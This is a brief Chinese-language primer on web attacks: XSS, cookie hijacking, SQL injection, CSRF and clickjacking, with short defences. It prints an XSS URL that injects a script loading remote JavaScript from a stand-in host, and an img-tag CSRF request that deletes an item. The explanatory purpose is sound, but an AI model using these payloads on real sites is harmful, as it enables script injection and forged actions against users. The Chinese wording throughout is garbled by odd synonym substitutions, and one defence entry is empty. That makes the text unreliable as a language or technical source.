1: XSS（cross site Script）
XSS的范例：
1: get型
指引诱用户翻开一个url,这个url的片断标志符是实行一段下载歹意进击的js文件的js代码，比方

http://hehe.com/hehe.html?name=xss<script src=http://haha.com/xxs.js></script> 

防备：
2: post型
在表单提交的时刻，在类似于富文本框之类的处所输入一段歹意的js代码。
防备：对表单提交的内容做花样搜检和关键字过滤，比方：

1: 邮箱必需是邮箱的花样，名字只能是字母。。。
2: 富文本框过滤特别符号‘<script’之类的

3: Cookie挟制
平常Cookie存放着一些主要的信息，比方客户的上岸信息，假如Cookie被挟制，那就暴露了用户信息，更严峻的是进击者能够用此上岸被害人的账号。

2: SQL注入
指客户能够向服务器提交一段SQL代码。
防备：

1: 做表单考证，过滤特别字符

3: 跨站要求捏造（CSRF：Cross Site Request Forgery）
指B站的进击者能够获得在A站某个要求的一切参数，在B站提议一个属于A站的要求，这就是跨站要求。比方：

GET http://a.com/item/delete?id=1

客户上岸了A站，然后又去接见B站，在B站要求了一张图片

<img src="http://a.com/item/delete?id=1"/> 

这时刻受害者在不知道的状况下提议了一个删除要求。
防备：

每一个要求都加一个token,服务器端对每一个要求都考证token。

4: 点击挟制（ClickJacking）
用一个通明的iframe掩盖在网页上，诳骗客户在这个iframe上操纵。处理的方法是从泉源上处理，也就是条件式地许可iframe的嵌入。在HTTP头：X-Frame-Options设置本身想要的值：

DENY：制止任何页面的frame加载；
SAMEORIGIN：只要同源页面的frame可加载；
ALLOW-FROM：可定义许可frame加载的页面地点。